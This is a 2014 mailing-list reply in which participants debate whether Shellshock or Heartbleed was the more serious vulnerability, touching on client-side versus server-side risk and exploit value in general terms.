On Tue, Sep 30, 2014 at 02:24:44PM +0200, rysiek wrote: > OHAI, > > > Shellshock affects clients, including admins :) > > > > Over DHCP you get instant root. > > > > Over qmail local delivery, without any interaction > > you get the lusers $HOME and /var/mail and having > > in mind the state of current kernels the road > > to euid 0 is not very long. > > > > It might affect some suid progies too. > > Yeah, but that means the danger level is somewhere on the "client-side root" > side, rather than "server-side root". >
Client side and server side are related. Would you be comfortable to admin a server from a rooted client? (I can offer you free shell to ssh out of it ;). > > AFAICT HB didn't allow code execution, just reading memory. > > "Just" potentially reading plaintext passwords straight off of RAM, SSL/TLS > certificates, GPG keys, etc., potentially (and demonstrably!) giving one a > way > not only to take over the given server, but to decrypt past saved > communications with a given host, if the host used SSL without perfect > forward > secrecy. > > Shellshock is more of a "personal client hygiene" kind of bug (a bad one, but > still); HB was "we're *all* affected and fucked, change passwords NOW and > hope > for the best". > If I had a budget for buying sploits, I would pay much more for shockshell than for HB, might be wrong. > -- > Pozdr > rysiek
